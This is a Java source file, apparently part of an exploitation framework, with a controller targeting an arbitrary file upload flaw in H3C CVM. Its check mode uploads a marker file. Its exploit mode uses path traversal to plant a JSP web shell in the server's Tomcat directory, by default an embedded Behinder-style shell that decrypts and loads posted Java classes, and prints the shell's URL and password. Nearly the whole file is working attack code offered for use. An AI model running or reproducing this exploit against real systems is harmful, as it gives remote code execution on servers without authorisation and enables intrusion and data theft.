package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;

@BasicMapping(uri = "H3C")
public class H3CController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description="H3C_CVM_前台任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile)
    public void vul_H3C_CVM(Poc_Exp type, String target, Object... args) throws Exception {
        WriteLog("\n[*]开始检测：  H3C_CVM_前台任意文件上传漏洞");
        String data = "shellcode";
        String url2 = "/cas/js/lib/buttons/iconfig.jsp";
        String url = "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/iconfig.jsp&name=222";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String payload = "<%@page import=\"java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*\" %>\n" +
                        "<%!\n" +
                        "private byte[] Decrypt(byte[] data) throws Exception\n" +
                        "{\n" +
                        "    String key=\"e45e329feb5d925b\";\n" +
                        "\tfor (int i = 0; i < data.length; i++) {\n" +
                        "\t\tdata[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));\n" +
                        "\t}\n" +
                        "\treturn data;\n" +
                        "}\n" +
                        "%>\n" +
                        "    <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return\n" +
                        "        super.defineClass(b,0,b.length);}}%>\n" +
                        "        <%if (request.getMethod().equals(\"POST\")){\n" +
                        "            ByteArrayOutputStream bos = new ByteArrayOutputStream();\n" +
                        "            byte[] buf = new byte[512];\n" +
                        "            int length=request.getInputStream().read(buf);\n" +
                        "            while (length>0)\n" +
                        "            {\n" +
                        "                byte[] data= Arrays.copyOfRange(buf,0,length);\n" +
                        "                bos.write(data);\n" +
                        "                length=request.getInputStream().read(buf);\n" +
                        "            }\n" +
                        "        new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}\n" +
                        "    %>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
                }
                String expshellpath = Utils.getRandomString(4)+".jsp";
                url = url.replace("iconfig.jsp",expshellpath);
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest3.addHeaders("Content-range"," bytes 0-10/20");
                httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest3.addHeaders("Content-type","");
                httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                httpRequest3.addHeaders("Accept"," text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                data = data.replace("shellcode",payload);

                httpRequest3.Post(data);

                Response result1 = new HttpRequest(target +url2.replace("iconfig.jsp",expshellpath)).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +url2.replace("iconfig.jsp",expshellpath));
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +url2.replace("iconfig.jsp",expshellpath));
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                String shellpath = Utils.getRandomString(4)+".jsp";
                String poc = "c0bb4ba866309a864d22f8853e8f7213";
                HttpRequest httpRequest2 = new HttpRequest(target+url.replace("iconfig.jsp",shellpath));
                httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest2.addHeaders("Content-range"," bytes 0-10/20");
                httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest2.addHeaders("Content-type","");
                httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                httpRequest2.addHeaders("Accept"," text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                httpRequest2.Post(data.replace("shellcode",poc));
                Response result = new HttpRequest(target+url2.replace("iconfig.jsp",shellpath)).Get("");
                if(result.responseBody.contains("c0bb4ba866309a864d22f8853e8f7213")&&result.statusCode==200){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("访问："+target +url2.replace("iconfig.jsp",shellpath));
                }else {
                    WriteLog("\n[-] 不存在漏洞");
                }
        }
    }
}
